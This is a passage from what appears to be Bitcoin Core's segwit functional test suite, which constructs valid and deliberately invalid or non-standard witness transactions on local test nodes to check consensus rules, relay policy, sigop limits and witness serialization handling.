tx2.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx2.vout = [CTxOut(tx.vout[0].nValue - 1000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
# Gets accepted to both policy-enforcing nodes and others.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
temp_utxo.pop() # last entry in temp_utxo was the output we just spent
temp_utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
# Spend everything in temp_utxo into a segwit v2 output.
tx3 = CTransaction()
total_value = 0
for i in temp_utxo:
tx3.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
total_value += i.nValue
tx3.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
tx3.vout.append(CTxOut(total_value - 1000, script_pubkey))
tx3.rehash()
# First we test this transaction against a node with
# fRequireStandard=true, making sure the txid is added to the reject filter.
self.std_node.announce_tx_and_wait_for_getdata(tx3)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, with_witness=True, accepted=False, reason="bad-txns-nonstandard-inputs")
# Now the node will no longer ask for getdata of this transaction when advertised by same txid
self.std_node.announce_tx_and_wait_for_getdata(tx3, success=False)
# Spending a higher version witness output is not allowed by policy,
# even with fRequireStandard=false.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False, reason="reserved for soft-fork upgrades")
# A block containing the transaction is still valid, however.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2, tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
# Add utxo to our list
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_premature_coinbase_witness_spend(self):
block = self.build_next_block()
# Change the output of the block to be a witness output.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
block.vtx[0].vout[0].scriptPubKey = script_pubkey
# This next line will rehash the coinbase and update the merkle
# root, and solve.
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
spend_tx = CTransaction()
spend_tx.vin = [CTxIn(COutPoint(block.vtx[0].sha256, 0), b"")]
spend_tx.vout = [CTxOut(block.vtx[0].vout[0].nValue, witness_program)]
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
spend_tx.rehash()
# Now test a premature spend.
self.nodes[0].generate(98)
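# Coinbase outputs mature after 100 blocks; the witness coinbase has
# only 99 confirmations at this point, so spending it should fail.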
self.sync_blocks()
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=False)
# Advancing one more block should allow the spend.
self.nodes[0].generate(1)
block2 = self.build_next_block()
self.update_witness_block_with_transactions(block2, [spend_tx])
test_witness_block(self.nodes[0], self.test_node, block2, accepted=True)
self.sync_blocks()
@subtest # type: ignore
def test_uncompressed_pubkey(self):
"""Test uncompressed pubkey validity in segwit transactions.
Uncompressed pubkeys are no longer supported in default relay policy,
but (for now) are still valid in blocks."""
# Segwit transactions using uncompressed pubkeys are not accepted
# under default policy, but should still pass consensus.
key = ECKey()
key.generate(False)
pubkey = key.get_pubkey().get_bytes()
assert_equal(len(pubkey), 65) # This should be an uncompressed pubkey
utxo = self.utxo.pop(0)
# Test 1: P2WPKH
# First create a P2WPKH output that uses an uncompressed pubkey
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(utxo.sha256, utxo.n), b""))
tx.vout.append(CTxOut(utxo.nValue - 1000, script_pkh))
tx.rehash()
# Confirm it in a block.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try to spend it. Send it to a P2WSH output, which we'll
# use in the next test.
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_wsh = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_wsh))
script = keyhash_to_p2pkh_script(pubkeyhash)
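# (BIP 143: a P2WPKH input is signed using the corresponding P2PKH
# script as the scriptCode.)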
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.rehash()
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 2: P2WSH
# Try to spend the P2WSH output created in last test.
# Send it to a P2SH(P2WSH) output, which we'll use in the next test.
script_p2sh = script_to_p2sh_script(script_wsh)
script_sig = CScript([script_wsh])
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_p2sh))
tx3.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx3, 0, SIGHASH_ALL, tx2.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
# But passes consensus.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx3])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 3: P2SH(P2WSH)
# Try to spend the P2SH output created in the last test.
# Send it to a P2PKH output, which we'll use in the next test.
script_pubkey = keyhash_to_p2pkh_script(pubkeyhash)
tx4 = CTransaction()
tx4.vin.append(CTxIn(COutPoint(tx3.sha256, 0), script_sig))
tx4.vout.append(CTxOut(tx3.vout[0].nValue - 1000, script_pubkey))
tx4.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx4, 0, SIGHASH_ALL, tx3.vout[0].nValue, key)
# Should fail policy test.
test_transaction_acceptance(self.nodes[0], self.test_node, tx4, True, False, 'non-mandatory-script-verify-flag (Using non-compressed keys in segwit)')
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx4])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Test 4: Uncompressed pubkeys should still be valid in non-segwit
# transactions.
tx5 = CTransaction()
tx5.vin.append(CTxIn(COutPoint(tx4.sha256, 0), b""))
tx5.vout.append(CTxOut(tx4.vout[0].nValue - 1000, CScript([OP_TRUE])))
(sig_hash, err) = LegacySignatureHash(script_pubkey, tx5, 0, SIGHASH_ALL)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
tx5.vin[0].scriptSig = CScript([signature, pubkey])
tx5.rehash()
# Should pass policy and consensus.
test_transaction_acceptance(self.nodes[0], self.test_node, tx5, True, True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx5])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.append(UTXO(tx5.sha256, 0, tx5.vout[0].nValue))
@subtest # type: ignore
def test_signature_version_1(self):
key = ECKey()
key.generate()
pubkey = key.get_pubkey().get_bytes()
witness_program = CScript([pubkey, CScriptOp(OP_CHECKSIG)])
script_pubkey = script_to_p2wsh_script(witness_program)
# First create a witness output for use in the tests.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
# Mine this transaction in preparation for following tests.
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.sync_blocks()
self.utxo.pop(0)
# Test each hashtype
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
for sigflag in [0, SIGHASH_ANYONECANPAY]:
for hashtype in [SIGHASH_ALL, SIGHASH_NONE, SIGHASH_SINGLE]:
hashtype |= sigflag
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
tx.vout.append(CTxOut(prev_utxo.nValue - 1000, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
# Too-large input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue + 1, key)
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Too-small input value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue - 1, key)
block.vtx.pop() # remove last tx
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try correct value
sign_p2pk_witness_input(witness_program, tx, 0, hashtype, prev_utxo.nValue, key)
block.vtx.pop()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
prev_utxo = UTXO(tx.sha256, 0, tx.vout[0].nValue)
# Test combinations of signature hashes.
# Split the utxo into a lot of outputs.
# Randomly choose up to 10 to spend, sign with different hashtypes, and
# output to a random number of outputs. Repeat NUM_SIGHASH_TESTS times.
# Ensure that we've tested a situation where we use SIGHASH_SINGLE with
# an input index > number of outputs.
NUM_SIGHASH_TESTS = 500
temp_utxos = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(prev_utxo.sha256, prev_utxo.n), b""))
split_value = prev_utxo.nValue // NUM_SIGHASH_TESTS
for _ in range(NUM_SIGHASH_TESTS):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, prev_utxo.nValue, key)
for i in range(NUM_SIGHASH_TESTS):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
used_sighash_single_out_of_bounds = False
for i in range(NUM_SIGHASH_TESTS):
# Ping regularly to keep the connection alive
if (not i % 100):
self.test_node.sync_with_ping()
# Choose random number of inputs to use.
num_inputs = random.randint(1, 10)
# Create a slight bias for producing more utxos
num_outputs = random.randint(1, 11)
random.shuffle(temp_utxos)
assert len(temp_utxos) > num_inputs
tx = CTransaction()
total_value = 0
for i in range(num_inputs):
tx.vin.append(CTxIn(COutPoint(temp_utxos[i].sha256, temp_utxos[i].n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
total_value += temp_utxos[i].nValue
split_value = total_value // num_outputs
for _ in range(num_outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
for i in range(num_inputs):
# Now try to sign each input, using a random hashtype.
anyonecanpay = 0
if random.randint(0, 1):
anyonecanpay = SIGHASH_ANYONECANPAY
hashtype = random.randint(1, 3) | anyonecanpay
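# (1 = SIGHASH_ALL, 2 = SIGHASH_NONE, 3 = SIGHASH_SINGLE)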
sign_p2pk_witness_input(witness_program, tx, i, hashtype, temp_utxos[i].nValue, key)
if (hashtype == SIGHASH_SINGLE and i >= num_outputs):
used_sighash_single_out_of_bounds = True
tx.rehash()
for i in range(num_outputs):
temp_utxos.append(UTXO(tx.sha256, i, split_value))
temp_utxos = temp_utxos[num_inputs:]
block.vtx.append(tx)
# Test the block periodically, if we're close to maxblocksize
if (get_virtual_size(block) > MAX_BLOCK_BASE_SIZE - 1000):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
block = self.build_next_block()
if (not used_sighash_single_out_of_bounds):
self.log.info("WARNING: this test run didn't attempt SIGHASH_SINGLE with out-of-bounds index value")
# Test the transactions we've added to the block
if (len(block.vtx) > 1):
self.update_witness_block_with_transactions(block, [])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now test witness version 0 P2PKH transactions
pubkeyhash = hash160(pubkey)
script_pkh = key_to_p2wpkh_script(pubkey)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(temp_utxos[0].sha256, temp_utxos[0].n), b""))
tx.vout.append(CTxOut(temp_utxos[0].nValue, script_pkh))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, 0, SIGHASH_ALL, temp_utxos[0].nValue, key)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
script = keyhash_to_p2pkh_script(pubkeyhash)
sig_hash = SegwitV0SignatureHash(script, tx2, 0, SIGHASH_ALL, tx.vout[0].nValue)
signature = key.sign_ecdsa(sig_hash) + b'\x01' # 0x1 is SIGHASH_ALL
# Check that we can't have a scriptSig
tx2.vin[0].scriptSig = CScript([signature, pubkey])
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Move the signature to the witness.
block.vtx.pop()
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [signature, pubkey]
tx2.vin[0].scriptSig = b""
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
temp_utxos.pop(0)
# Update self.utxos for later tests by creating two outputs
# that consolidate all the coins in temp_utxos.
output_value = sum(i.nValue for i in temp_utxos) // 2
tx = CTransaction()
index = 0
# Just spend to our usual anyone-can-spend output
tx.vout = [CTxOut(output_value, CScript([OP_TRUE]))] * 2
for i in temp_utxos:
# Use SIGHASH_ALL|SIGHASH_ANYONECANPAY so we can build up
# the signatures as we go.
tx.vin.append(CTxIn(COutPoint(i.sha256, i.n), b""))
tx.wit.vtxinwit.append(CTxInWitness())
sign_p2pk_witness_input(witness_program, tx, index, SIGHASH_ALL | SIGHASH_ANYONECANPAY, i.nValue, key)
index += 1
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
for i in range(len(tx.vout)):
self.utxo.append(UTXO(tx.sha256, i, tx.vout[i].nValue))
@subtest # type: ignore
def test_non_standard_witness_blinding(self):
"""Test behavior of unnecessary witnesses in transactions does not blind the node for the transaction"""
# Create a p2sh output -- this is so we can pass the standardness
# rules (an anyone-can-spend OP_TRUE would be rejected, if not wrapped
# in P2SH).
p2sh_program = CScript([OP_TRUE])
script_pubkey = script_to_p2sh_script(p2sh_program)
# Now check that unnecessary witnesses can't be used to blind a node
# to a transaction, e.g. by violating standardness checks.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# We'll add an unnecessary witness to this transaction that would cause
# it to be non-standard, to test that violating policy with a witness
# doesn't blind a node to a transaction. Transactions
# rejected for having a witness shouldn't be added
# to the rejection cache.
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), CScript([p2sh_program])))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * 400]
tx2.rehash()
# This will be rejected due to a policy check:
# no witness is allowed, since this is a plain P2SH spend, not a witness program
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, True, False, 'bad-witness-nonstandard')
# If we send without witness, it should be accepted.
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, False, True)
# Now create a new anyone-can-spend utxo for the next test.
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), CScript([p2sh_program])))
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, False, True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, False, True)
self.nodes[0].generate(1)
self.sync_blocks()
# Update our utxo list; we spent the first entry.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_non_standard_witness(self):
"""Test detection of non-standard P2WSH witness"""
pad = chr(1).encode('latin-1')
# Create scripts for tests
scripts = []
scripts.append(CScript([OP_DROP] * 100))
scripts.append(CScript([OP_DROP] * 99))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 60))
scripts.append(CScript([pad * 59] * 59 + [OP_DROP] * 61))
p2wsh_scripts = []
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# For each script, generate a pair of P2WSH and P2SH-P2WSH output.
outputvalue = (self.utxo[0].nValue - 1000) // (len(scripts) * 2)
for i in scripts:
p2wsh = script_to_p2wsh_script(i)
p2wsh_scripts.append(p2wsh)
tx.vout.append(CTxOut(outputvalue, p2wsh))
tx.vout.append(CTxOut(outputvalue, script_to_p2sh_script(p2wsh)))
tx.rehash()
txid = tx.sha256
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
# Creating transactions for tests
p2wsh_txs = []
p2sh_txs = []
for i in range(len(scripts)):
p2wsh_tx = CTransaction()
p2wsh_tx.vin.append(CTxIn(COutPoint(txid, i * 2)))
p2wsh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2wsh_tx.wit.vtxinwit.append(CTxInWitness())
p2wsh_tx.rehash()
p2wsh_txs.append(p2wsh_tx)
p2sh_tx = CTransaction()
p2sh_tx.vin.append(CTxIn(COutPoint(txid, i * 2 + 1), CScript([p2wsh_scripts[i]])))
p2sh_tx.vout.append(CTxOut(outputvalue - 5000, CScript([OP_0, hash160(b"")])))
p2sh_tx.wit.vtxinwit.append(CTxInWitness())
p2sh_tx.rehash()
p2sh_txs.append(p2sh_tx)
# Testing native P2WSH
# Witness stack size, excluding witnessScript, over 100 is non-standard
p2wsh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[0], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[0], True, True)
# Stack element size over 80 bytes is non-standard
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[1], True, True)
# Standard nodes should accept if element size is not over 80 bytes
p2wsh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[1], True, True)
# witnessScript size at 3600 bytes is standard
p2wsh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[2], True, True)
# witnessScript size at 3601 bytes is non-standard
p2wsh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2wsh_txs[3], True, False, 'bad-witness-nonstandard')
# Non-standard nodes should accept
test_transaction_acceptance(self.nodes[0], self.test_node, p2wsh_txs[3], True, True)
# Repeating the same tests with P2SH-P2WSH
p2sh_txs[0].wit.vtxinwit[0].scriptWitness.stack = [pad] * 101 + [scripts[0]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[0], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[0], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 81] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[1], True, True)
p2sh_txs[1].wit.vtxinwit[0].scriptWitness.stack = [pad * 80] * 100 + [scripts[1]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[1], True, True)
p2sh_txs[2].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, scripts[2]]
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[2], True, True)
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[2], True, True)
p2sh_txs[3].wit.vtxinwit[0].scriptWitness.stack = [pad, pad, pad, scripts[3]]
test_transaction_acceptance(self.nodes[1], self.std_node, p2sh_txs[3], True, False, 'bad-witness-nonstandard')
test_transaction_acceptance(self.nodes[0], self.test_node, p2sh_txs[3], True, True)
self.nodes[0].generate(1) # Mine and clean up the mempool of non-standard node
# Valid but non-standard transactions in a block should be accepted by standard node
self.sync_blocks()
assert_equal(len(self.nodes[0].getrawmempool()), 0)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
self.utxo.pop(0)
@subtest # type: ignore
def test_upgrade_after_activation(self):
"""Test the behavior of starting up a segwit-aware node after the softfork has activated."""
# All nodes are caught up and node 2 is a pre-segwit node that will soon upgrade.
for n in range(2):
assert_equal(self.nodes[n].getblockcount(), self.nodes[2].getblockcount())
assert softfork_active(self.nodes[n], "segwit")
assert SEGWIT_HEIGHT < self.nodes[2].getblockcount()
assert 'segwit' not in self.nodes[2].getblockchaininfo()['softforks']
# Restarting node 2 should result in a shutdown because the blockchain consists of
# insufficiently validated blocks per segwit consensus rules.
self.stop_node(2)
self.nodes[2].assert_start_raises_init_error(
extra_args=[f"-segwitheight={SEGWIT_HEIGHT}"],
expected_msg=f": Witness data for blocks after height {SEGWIT_HEIGHT} requires validation. Please restart with -reindex..\nPlease restart with -reindex or -reindex-chainstate to recover.",
)
# As directed, the user restarts the node with -reindex
self.start_node(2, extra_args=["-reindex", f"-segwitheight={SEGWIT_HEIGHT}"])
# With the segwit consensus rules, the node is able to validate only up to SEGWIT_HEIGHT - 1
assert_equal(self.nodes[2].getblockcount(), SEGWIT_HEIGHT - 1)
self.connect_nodes(0, 2)
# We reconnect more than 100 blocks, give it plenty of time
# sync_blocks() also verifies the best block hash is the same for all nodes
self.sync_blocks(timeout=240)
# The upgraded node should now have segwit activated
assert softfork_active(self.nodes[2], "segwit")
@subtest # type: ignore
def test_witness_sigops(self):
"""Test sigop counting is correct inside witnesses."""
# Keep this under MAX_OPS_PER_SCRIPT (201)
witness_program = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKMULTISIG] * 5 + [OP_CHECKSIG] * 193 + [OP_ENDIF])
script_pubkey = script_to_p2wsh_script(witness_program)
sigops_per_script = 20 * 5 + 193 * 1
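        # Arithmetic note: each OP_CHECKMULTISIG counts as 20 sigops and each
        # OP_CHECKSIG as 1, so one spend of witness_program costs
        # 20*5 + 193*1 = 293 sigops.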
# We'll produce 2 extra outputs, one with a program that would take us
# over max sig ops, and one with a program that would exactly reach max
# sig ops
outputs = (MAX_SIGOP_COST // sigops_per_script) + 2
extra_sigops_available = MAX_SIGOP_COST % sigops_per_script
# We chose the number of checkmultisigs/checksigs to make this work:
assert extra_sigops_available < 100 # steer clear of MAX_OPS_PER_SCRIPT
# This script, when spent with the first
# N(=MAX_SIGOP_COST//sigops_per_script) outputs of our transaction,
# would push us just over the block sigop limit.
witness_program_toomany = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available + 1) + [OP_ENDIF])
script_pubkey_toomany = script_to_p2wsh_script(witness_program_toomany)
# If we spend this script instead, we would exactly reach our sigop
# limit (for witness sigops).
witness_program_justright = CScript([OP_TRUE, OP_IF, OP_TRUE, OP_ELSE] + [OP_CHECKSIG] * (extra_sigops_available) + [OP_ENDIF])
script_pubkey_justright = script_to_p2wsh_script(witness_program_justright)
# First split our available utxo into a bunch of outputs
split_value = self.utxo[0].nValue // outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
for _ in range(outputs):
tx.vout.append(CTxOut(split_value, script_pubkey))
tx.vout[-2].scriptPubKey = script_pubkey_toomany
tx.vout[-1].scriptPubKey = script_pubkey_justright
tx.rehash()
block_1 = self.build_next_block()
self.update_witness_block_with_transactions(block_1, [tx])
test_witness_block(self.nodes[0], self.test_node, block_1, accepted=True)
tx2 = CTransaction()
# If we try to spend the first n-1 outputs from tx, that should be
# too many sigops.
total_value = 0
for i in range(outputs - 1):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program]
total_value += tx.vout[i].nValue
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_toomany]
tx2.vout.append(CTxOut(total_value, CScript([OP_TRUE])))
tx2.rehash()
block_2 = self.build_next_block()
self.update_witness_block_with_transactions(block_2, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=False)
# Try dropping the last input in tx2, and add an output that has
# too many sigops (contributing to legacy sigop count).
checksig_count = (extra_sigops_available // 4) + 1
script_pubkey_checksigs = CScript([OP_CHECKSIG] * checksig_count)
tx2.vout.append(CTxOut(0, script_pubkey_checksigs))
tx2.vin.pop()
tx2.wit.vtxinwit.pop()
tx2.vout[0].nValue -= tx.vout[-2].nValue
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# If we drop the last checksig in this output, the tx should succeed.
block_4 = self.build_next_block()
tx2.vout[-1].scriptPubKey = CScript([OP_CHECKSIG] * (checksig_count - 1))
tx2.rehash()
self.update_witness_block_with_transactions(block_4, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_4, accepted=True)
# Reset the tip back down for the next test
self.sync_blocks()
for x in self.nodes:
x.invalidateblock(block_4.hash)
# Try replacing the last input of tx2 to be spending the last
# output of tx
block_5 = self.build_next_block()
tx2.vout.pop()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, outputs - 1), b""))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [witness_program_justright]
tx2.rehash()
self.update_witness_block_with_transactions(block_5, [tx2])
test_witness_block(self.nodes[0], self.test_node, block_5, accepted=True)
# TODO: test p2sh sigop counting
# Cleanup and prep for next test
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_superfluous_witness(self):
        # Serialization helper that always writes the witness flag as 3
def serialize_with_bogus_witness(tx):
flags = 3
r = b""
r += struct.pack("<i", tx.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
r += struct.pack("<B", flags)
r += ser_vector(tx.vin)
r += ser_vector(tx.vout)
if flags & 1:
if (len(tx.wit.vtxinwit) != len(tx.vin)):
# vtxinwit must have the same length as vin
tx.wit.vtxinwit = tx.wit.vtxinwit[:len(tx.vin)]
for _ in range(len(tx.wit.vtxinwit), len(tx.vin)):
tx.wit.vtxinwit.append(CTxInWitness())
r += tx.wit.serialize()
r += struct.pack("<I", tx.nLockTime)
return r
class msg_bogus_tx(msg_tx):
def serialize(self):
return serialize_with_bogus_witness(self.tx)
self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(address_type='bech32'), 5)
self.nodes[0].generate(1)
unspent = next(u for u in self.nodes[0].listunspent() if u['spendable'] and u['address'].startswith('bcrt'))
raw = self.nodes[0].createrawtransaction([{"txid": unspent['txid'], "vout": unspent['vout']}], {self.nodes[0].getnewaddress(): 1})
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Superfluous witness record']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
raw = self.nodes[0].signrawtransactionwithwallet(raw)
assert raw['complete']
raw = raw['hex']
tx = tx_from_hex(raw)
assert_raises_rpc_error(-22, "TX decode failed", self.nodes[0].decoderawtransaction, hexstring=serialize_with_bogus_witness(tx).hex(), iswitness=True)
with self.nodes[0].assert_debug_log(['Unknown transaction optional data']):
self.test_node.send_and_ping(msg_bogus_tx(tx))
@subtest # type: ignore
def test_wtxid_relay(self):
# Use brand new nodes to avoid contamination from earlier tests
self.wtx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=True), services=NODE_NETWORK | NODE_WITNESS)
self.tx_node = self.nodes[0].add_p2p_connection(TestP2PConn(wtxidrelay=False), services=NODE_NETWORK | NODE_WITNESS)
# Check wtxidrelay feature negotiation message through connecting a new peer
def received_wtxidrelay():
